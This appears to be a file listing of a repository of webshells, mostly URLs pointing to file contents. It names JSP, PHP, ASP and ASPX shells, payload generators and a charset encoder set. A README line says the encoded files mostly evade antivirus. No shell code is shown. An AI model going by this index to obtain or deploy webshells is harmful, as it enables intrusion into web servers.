├── JSP-Webshells ├── .gitignore ├── README.md ├── jsp.zip ├── jsp │ ├── 1 │ │ ├── 1.jsp │ │ ├── README.md │ │ └── Threedr3am.java │ ├── 2 │ │ ├── 2.jsp │ │ ├── README.md │ │ └── Threedr3am_2.java │ ├── 3 │ │ ├── 3.jsp │ │ └── README.md │ ├── 4 │ │ ├── 4.jsp │ │ ├── README.md │ │ └── Threedr3am_4.java │ ├── 5 │ │ ├── 5.jsp │ │ └── README.md │ ├── 6 │ │ ├── 6.jsp │ │ ├── README.md │ │ └── Threedr3am_6.java │ ├── 7 │ │ ├── 7.jsp │ │ └── README.md │ ├── 8 │ │ ├── 8.jsp │ │ └── README.md │ ├── 9 │ │ ├── 9.jsp │ │ └── README.md │ ├── 10 │ │ ├── 10.jsp │ │ ├── META-INF │ │ │ └── services │ │ │ │ └── javax.script.ScriptEngineFactory │ │ ├── README.md │ │ ├── Threedr3amScript.java │ │ └── threedr3am.jar │ ├── 11 │ │ ├── 11.jsp │ │ ├── README.md │ │ └── Threedr3am_11.java │ ├── 12 │ │ ├── 12.jsp │ │ ├── README.md │ │ └── Threedr3am_12.java │ ├── 13 │ │ ├── 13.jsp │ │ ├── Calc.java │ │ ├── LdapServer.java │ │ ├── OperationInterceptor.java │ │ └── README.md │ ├── 14 │ │ ├── 14.jsp │ │ ├── 14_2.jsp │ │ └── README.md │ ├── 15 │ │ ├── 15.jsp │ │ ├── README.md │ │ ├── Threedr3am_15.java │ │ └── Threedr3am_make.java │ ├── 16 │ │ ├── 16.jsp │ │ ├── README.md │ │ └── Threedr3am_16.java │ ├── 17 │ │ ├── 17.jsp │ │ └── README.md │ └── 18 │ │ ├── 18.jsp │ │ └── README.md └── pom.xml ├── LICENSE ├── README.md ├── asp ├── README.md └── asp-venom.py ├── aspx ├── README.md └── aspx-venom.py ├── doc └── README.md ├── jsp ├── README.md ├── charsets.txt ├── encoder │ ├── Big5-HKSCS.jsp │ ├── Big5.jsp │ ├── EUC-KR.jsp │ ├── GB18030.jsp │ ├── GB2312.jsp │ ├── GBK.jsp │ ├── HZ-GB-2312.jsp │ ├── IBM037.jsp │ ├── IBM1026.jsp │ ├── IBM273.jsp │ ├── IBM424.jsp │ ├── IBM437.jsp │ ├── IBM500.jsp │ ├── IBM775.jsp │ ├── IBM850.jsp │ ├── IBM852.jsp │ ├── IBM855.jsp │ ├── IBM857.jsp │ ├── IBM860.jsp │ ├── IBM861.jsp │ ├── IBM862.jsp │ ├── IBM863.jsp │ ├── IBM865.jsp │ ├── IBM866.jsp │ ├── IBM869.jsp │ ├── ISO-2022-JP-2.jsp │ ├── ISO-2022-JP.jsp │ ├── ISO-2022-KR.jsp │ ├── ISO-8859-10.jsp │ ├── ISO-8859-13.jsp │ ├── ISO-8859-14.jsp │ ├── ISO-8859-15.jsp │ ├── ISO-8859-16.jsp │ ├── KOI8-R.jsp │ ├── KOI8-U.jsp │ ├── KS_C_5601-1987.jsp │ ├── KZ-1048.jsp │ ├── PTCP154.jsp │ ├── README.md │ ├── Shift_JIS.jsp │ ├── TIS-620.jsp │ ├── UNICODE-1-1-UTF-7.jsp │ ├── US-ASCII.jsp │ ├── UTF-16.jsp │ ├── UTF-16BE.jsp │ ├── UTF-16LE.jsp │ ├── UTF-32.jsp │ ├── UTF-32BE.jsp │ ├── UTF-32LE.jsp │ ├── UTF-7.jsp │ ├── UTF-8.jsp │ ├── hp-roman8.jsp │ ├── macintosh.jsp │ ├── windows-1250.jsp │ ├── windows-1251.jsp │ ├── windows-1252.jsp │ ├── windows-1253.jsp │ ├── windows-1254.jsp │ ├── windows-1255.jsp │ ├── windows-1256.jsp │ ├── windows-1257.jsp │ └── windows-1258.jsp ├── jsp-encoder.py ├── jsp-venom.py └── shell.jsp ├── php ├── README.md ├── i.txt ├── i.txt.bypass.php └── php-venom-3.3.py └── php_new ├── .htaccess ├── .user.ini ├── 1.png ├── Exception.php ├── behinder.php ├── calc.php ├── comment-php5.php ├── godzilla.php ├── googlebot.gif ├── googlebot.jpg ├── googlebot.php ├── gz.php ├── header-via.php ├── math.php ├── math.zip ├── noalphanumeric.php ├── p0wny-s.php ├── p0wny-shell.php ├── p0wny-shell1.php ├── p0wny.jpg ├── script.jpg ├── script.php └── write.php /JSP-Webshells/.gitignore: -------------------------------------------------------------------------------- 1 | out 2 | build 3 | target -------------------------------------------------------------------------------- /JSP-Webshells/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp.zip -------------------------------------------------------------------------------- /JSP-Webshells/jsp/1/1.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/1/1.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/1/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/1/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/1/Threedr3am.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/1/Threedr3am.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/10/10.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/10/10.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/10/META-INF/services/javax.script.ScriptEngineFactory: -------------------------------------------------------------------------------- 1 | Threedr3amScript -------------------------------------------------------------------------------- /JSP-Webshells/jsp/10/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/10/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/10/Threedr3amScript.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/10/Threedr3amScript.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/10/threedr3am.jar: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /JSP-Webshells/jsp/11/11.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/11/11.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/11/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/11/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/11/Threedr3am_11.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/11/Threedr3am_11.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/12/12.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/12/12.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/12/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/12/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/12/Threedr3am_12.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/12/Threedr3am_12.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/13/13.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/13/13.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/13/Calc.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/13/Calc.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/13/LdapServer.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/13/LdapServer.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/13/OperationInterceptor.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/13/OperationInterceptor.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/13/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/13/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/14/14.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/14/14.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/14/14_2.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/14/14_2.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/14/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/14/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/15/15.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/15/15.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/15/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/15/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/15/Threedr3am_15.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/15/Threedr3am_15.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/15/Threedr3am_make.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/15/Threedr3am_make.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/16/16.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/16/16.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/16/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/16/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/16/Threedr3am_16.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/16/Threedr3am_16.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/17/17.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/17/17.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/17/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/17/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/18/18.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/18/18.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/18/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/18/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/2/2.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/2/2.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/2/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/2/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/2/Threedr3am_2.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/2/Threedr3am_2.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/3/3.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/3/3.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/3/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/3/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/4/4.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/4/4.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/4/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/4/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/4/Threedr3am_4.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/4/Threedr3am_4.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/5/5.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/5/5.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/5/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/5/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/6/6.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/6/6.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/6/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/6/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/6/Threedr3am_6.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/6/Threedr3am_6.java -------------------------------------------------------------------------------- /JSP-Webshells/jsp/7/7.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/7/7.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/7/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/7/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/8/8.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/8/8.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/8/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/8/README.md -------------------------------------------------------------------------------- /JSP-Webshells/jsp/9/9.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/9/9.jsp -------------------------------------------------------------------------------- /JSP-Webshells/jsp/9/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/jsp/9/README.md -------------------------------------------------------------------------------- /JSP-Webshells/pom.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/JSP-Webshells/pom.xml -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/README.md -------------------------------------------------------------------------------- /asp/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/asp/README.md -------------------------------------------------------------------------------- /asp/asp-venom.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/asp/asp-venom.py -------------------------------------------------------------------------------- /aspx/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/aspx/README.md -------------------------------------------------------------------------------- /aspx/aspx-venom.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/aspx/aspx-venom.py -------------------------------------------------------------------------------- /doc/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/doc/README.md -------------------------------------------------------------------------------- /jsp/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/README.md -------------------------------------------------------------------------------- /jsp/charsets.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/charsets.txt -------------------------------------------------------------------------------- /jsp/encoder/Big5-HKSCS.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/Big5-HKSCS.jsp -------------------------------------------------------------------------------- /jsp/encoder/Big5.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/Big5.jsp -------------------------------------------------------------------------------- /jsp/encoder/EUC-KR.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/EUC-KR.jsp -------------------------------------------------------------------------------- /jsp/encoder/GB18030.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/GB18030.jsp -------------------------------------------------------------------------------- /jsp/encoder/GB2312.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/GB2312.jsp -------------------------------------------------------------------------------- /jsp/encoder/GBK.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/GBK.jsp -------------------------------------------------------------------------------- /jsp/encoder/HZ-GB-2312.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/HZ-GB-2312.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM037.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM037.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM1026.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM1026.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM273.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM273.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM424.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM424.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM437.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM437.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM500.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM500.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM775.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM775.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM850.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM850.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM852.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM852.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM855.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM855.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM857.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM857.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM860.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM860.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM861.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM861.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM862.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM862.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM863.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM863.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM865.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM865.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM866.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM866.jsp -------------------------------------------------------------------------------- /jsp/encoder/IBM869.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/IBM869.jsp -------------------------------------------------------------------------------- /jsp/encoder/ISO-2022-JP-2.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/ISO-2022-JP-2.jsp -------------------------------------------------------------------------------- /jsp/encoder/ISO-2022-JP.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/ISO-2022-JP.jsp -------------------------------------------------------------------------------- /jsp/encoder/ISO-2022-KR.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/ISO-2022-KR.jsp -------------------------------------------------------------------------------- /jsp/encoder/ISO-8859-10.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/ISO-8859-10.jsp -------------------------------------------------------------------------------- /jsp/encoder/ISO-8859-13.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/ISO-8859-13.jsp -------------------------------------------------------------------------------- /jsp/encoder/ISO-8859-14.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/ISO-8859-14.jsp -------------------------------------------------------------------------------- /jsp/encoder/ISO-8859-15.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/ISO-8859-15.jsp -------------------------------------------------------------------------------- /jsp/encoder/ISO-8859-16.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/ISO-8859-16.jsp -------------------------------------------------------------------------------- /jsp/encoder/KOI8-R.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/KOI8-R.jsp -------------------------------------------------------------------------------- /jsp/encoder/KOI8-U.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/KOI8-U.jsp -------------------------------------------------------------------------------- /jsp/encoder/KS_C_5601-1987.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/KS_C_5601-1987.jsp -------------------------------------------------------------------------------- /jsp/encoder/KZ-1048.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/KZ-1048.jsp -------------------------------------------------------------------------------- /jsp/encoder/PTCP154.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/PTCP154.jsp -------------------------------------------------------------------------------- /jsp/encoder/README.md: -------------------------------------------------------------------------------- 1 | ### 以上文件找到不是明文显示的就有大部分免杀效果 2 | -------------------------------------------------------------------------------- /jsp/encoder/Shift_JIS.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/Shift_JIS.jsp -------------------------------------------------------------------------------- /jsp/encoder/TIS-620.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/TIS-620.jsp -------------------------------------------------------------------------------- /jsp/encoder/UNICODE-1-1-UTF-7.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/UNICODE-1-1-UTF-7.jsp -------------------------------------------------------------------------------- /jsp/encoder/US-ASCII.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/US-ASCII.jsp -------------------------------------------------------------------------------- /jsp/encoder/UTF-16.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/UTF-16.jsp -------------------------------------------------------------------------------- /jsp/encoder/UTF-16BE.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/UTF-16BE.jsp -------------------------------------------------------------------------------- /jsp/encoder/UTF-16LE.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/UTF-16LE.jsp -------------------------------------------------------------------------------- /jsp/encoder/UTF-32.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/UTF-32.jsp -------------------------------------------------------------------------------- /jsp/encoder/UTF-32BE.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/UTF-32BE.jsp -------------------------------------------------------------------------------- /jsp/encoder/UTF-32LE.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/UTF-32LE.jsp -------------------------------------------------------------------------------- /jsp/encoder/UTF-7.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/UTF-7.jsp -------------------------------------------------------------------------------- /jsp/encoder/UTF-8.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/UTF-8.jsp -------------------------------------------------------------------------------- /jsp/encoder/hp-roman8.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/hp-roman8.jsp -------------------------------------------------------------------------------- /jsp/encoder/macintosh.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/macintosh.jsp -------------------------------------------------------------------------------- /jsp/encoder/windows-1250.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/windows-1250.jsp -------------------------------------------------------------------------------- /jsp/encoder/windows-1251.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/windows-1251.jsp -------------------------------------------------------------------------------- /jsp/encoder/windows-1252.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/windows-1252.jsp -------------------------------------------------------------------------------- /jsp/encoder/windows-1253.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/windows-1253.jsp -------------------------------------------------------------------------------- /jsp/encoder/windows-1254.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/windows-1254.jsp -------------------------------------------------------------------------------- /jsp/encoder/windows-1255.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/windows-1255.jsp -------------------------------------------------------------------------------- /jsp/encoder/windows-1256.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/windows-1256.jsp -------------------------------------------------------------------------------- /jsp/encoder/windows-1257.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/windows-1257.jsp -------------------------------------------------------------------------------- /jsp/encoder/windows-1258.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/encoder/windows-1258.jsp -------------------------------------------------------------------------------- /jsp/jsp-encoder.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/jsp-encoder.py -------------------------------------------------------------------------------- /jsp/jsp-venom.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/jsp-venom.py -------------------------------------------------------------------------------- /jsp/shell.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3x5ur/webshell-free/HEAD/jsp/shell.jsp -------------------------------------------------------------------------------- /php/README.md: 